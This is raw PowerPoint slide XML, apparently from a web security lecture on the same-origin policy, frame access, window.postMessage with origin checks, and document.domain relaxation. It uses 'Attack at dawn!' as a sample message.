              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166930" name="AutoShape 18"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3840163" y="5418138"/>
            <a:ext cx="1371600" cy="1147762"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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pic>
        <p:nvPicPr>
          <p:cNvPr id="33803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6713" y="5486400"/>
            <a:ext cx="760412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3804" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3898900" y="6211888"/>
            <a:ext cx="1282700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i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33805" name="Line 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4937125" y="4822825"/>
            <a:ext cx="1028700" cy="869950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360738"/>
            <a:ext cx="5032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rgbClr val="FFFFFF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Recent Data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024362"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="304800" y="1600200"/>
          <a:ext cx="8534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2710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5"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3614737"/>
            <a:ext cx="1439863" cy="1165225"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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9900" y="2379662"/>
            <a:ext cx="936625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2663" y="2346325"/>
            <a:ext cx="938212" cy="582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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4887913" y="2057400"/>
            <a:ext cx="796925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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site B</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3103563" y="2103437"/>
            <a:ext cx="787400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200" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 10"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4381500" y="3614737"/>
            <a:ext cx="1371600" cy="1149350"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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9900" y="3683000"/>
            <a:ext cx="762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" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2735263" y="4506912"/>
            <a:ext cx="1284287" cy="24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i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/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V="1">
            <a:off x="3695700" y="2722562"/>
            <a:ext cx="1096963" cy="871538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6138" y="3614737"/>
            <a:ext cx="762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" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425" y="4506912"/>
            <a:ext cx="1290638" cy="24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i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>B context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light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 flipV="1">
            <a:off x="3902075" y="2722562"/>
            <a:ext cx="1028700" cy="871538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V="1">
            <a:off x="5135563" y="2722562"/>
            <a:ext cx="0" cy="823913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V="1">
            <a:off x="3421063" y="2722562"/>
            <a:ext cx="0" cy="823913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rot="10800000" flipV="1">
            <a:off x="3970338" y="3957637"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effec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rot="10800000" flipH="1" flipV="1">
            <a:off x="3970338" y="4232275"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effec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892175" y="3635375"/>
            <a:ext cx="1439863" cy="1165225"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 12093"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="0">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="0082E5">
                  <a:alpha val="87000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0057E5">
                  <a:alpha val="59000"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5075" y="3703638"/>
            <a:ext cx="762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2" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="960438" y="4527550"/>
            <a:ext cx="1284287" cy="24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i="1" dirty="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Site A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t> context</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr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rot="10800000" flipV="1">
            <a:off x="2195513" y="3978275"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effec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rot="10800000" flipH="1" flipV="1">
            <a:off x="2195513" y="4252913"/>
            <a:ext cx="547687" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="50800">
            <a:solidFill>
              <a:srgbClr val="65AFFB"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="stealth" w="med" len="med"/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="25399" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="bg2">
                <a:alpha val="50000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effec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 flipV="1">
            <a:off x="1602580" y="2814340"/>
            <a:ext cx="1774825" cy="779759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6" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="931840" y="2590800"/>
            <a:ext cx="1665008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marL="342900" indent="-342900">
              <a:buAutoNum type="arabicParenBoth"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Server-client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>in the same origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1535392" y="4953000"/>
            <a:ext cx="1665008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i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>(2) Client-client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>in the same origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3743475" y="1610994"/>
            <a:ext cx="1514325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i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>(4) Server-client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>in different origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym typeface="Helvetica Neue Light" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4800600"/>
            <a:ext cx="1514325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i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>(3) Client-client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>in different origin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" i="1" dirty="0">
              <a:latin typeface="Helvetica Neue Light" charset="0"/>
              <a:ea typeface="굴림" pitchFamily="34" charset="-128"/>
              <a:sym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57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Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Server-client in the same origin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 with no restriction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394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i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Client-client in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>the same </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>origin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Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>handle = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“http://same-origin.org”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>handle.contentDocument.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>myDiv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>”);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9678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Interact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29699" name="Content Placeholder 4" descr="gmail-cha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524000"/>
            <a:ext cx="8001000" cy="4833938"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297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8A1FAB6-8AD0-4CCD-882B-A9FAE9926EE2}" type="slidenum">
              <a:rPr lang="en-GB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39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Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Client-client in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>different </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:latin typeface="Helvetica Neue Light" charset="0"/>
                <a:sym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>origin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postMessage</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.domain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829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window.postMessage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Content Placeholder 4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New API for inter-frame communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Supported in latest betas of many browsers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ko-KR" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="ko-KR" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>A network-like channel between frames</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="38916" name="Picture 62" descr="safa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819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4" descr="firef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819400"/>
            <a:ext cx="53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5" descr="ope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819400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130" descr="ie-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819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0" descr="chrome-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3925" y="2819400"/>
            <a:ext cx="5492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4495800"/>
            <a:ext cx="1676400" cy="20034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med"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38922" name="Right Arrow 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="4953000"/>
            <a:ext cx="1905000" cy="768350"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49989"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="009900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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Add a contact</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38923" name="Right Arrow 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4343400" y="5773738"/>
            <a:ext cx="1828800" cy="704850"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 49946"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="009900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9900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Share contacts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38924" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1268413" y="4419600"/>
            <a:ext cx="6961187" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect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38925" name="Picture 2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5445125"/>
            <a:ext cx="17526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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="3200400"/>
            <a:ext cx="7772400" cy="16002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990600" y="1920875"/>
            <a:ext cx="7772400" cy="8382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postMessage syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3994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None/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" smtClean="0">
              <a:latin typeface="Consolas" pitchFamily="49" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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frames[0].postMessage("Attack at dawn!",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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                      "http://b.com/");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" smtClean="0">
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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window.addEventListener("message", function (e) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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  if (e.origin == "http://a.com") {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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    ... e.data ... }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"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}, false);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="10-Point Star 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="6096000"/>
            <a:ext cx="762000" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="star10">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF9900"/>
          </a:solidFill>
          <a:ln>
            <a:noFill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100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Facebook</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1100">
                <a:solidFill>
                  <a:srgbClr val="172252"/>
                </a:solidFill>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>Anecdote</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="39945" name="Picture 12" descr="a.co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964113"/>
            <a:ext cx="261620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3" descr="b.co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0400" y="4964113"/>
            <a:ext cx="261620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947" name="Straight Arrow Connector 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="5751513"/>
            <a:ext cx="2514600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9948" name="TextBox 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3871913" y="5351463"/>
            <a:ext cx="1995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Attack at dawn!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ChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="2149475"/>
            <a:ext cx="6019800" cy="5175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include “targetOrigin”?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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goes wrong?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"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	frames[0].postMessage("Attack at dawn!");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Messages sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>, not principals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="-80" charset="-128"/>
              </a:rPr>
              <a:t>When would this happen?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4915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EAD8062-BFDB-4E21-95A4-C8B019B16442}" type="slidenum">
              <a:rPr lang="en-GB"/>
              <a:pPr/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 4" descr="reply-attack-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389438"/>
            <a:ext cx="297180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reply-attack-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389438"/>
            <a:ext cx="297180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ym typeface="Helvetica Neue Light" charset="0"/>
              </a:rPr>
              <a:t>Domain Relaxation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36867" name="Content Placeholder 24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1828800"/>
            <a:ext cx="7772400" cy="4114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Origin: scheme, host, (port), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>hasSetDomain</a:t>
            </a:r>
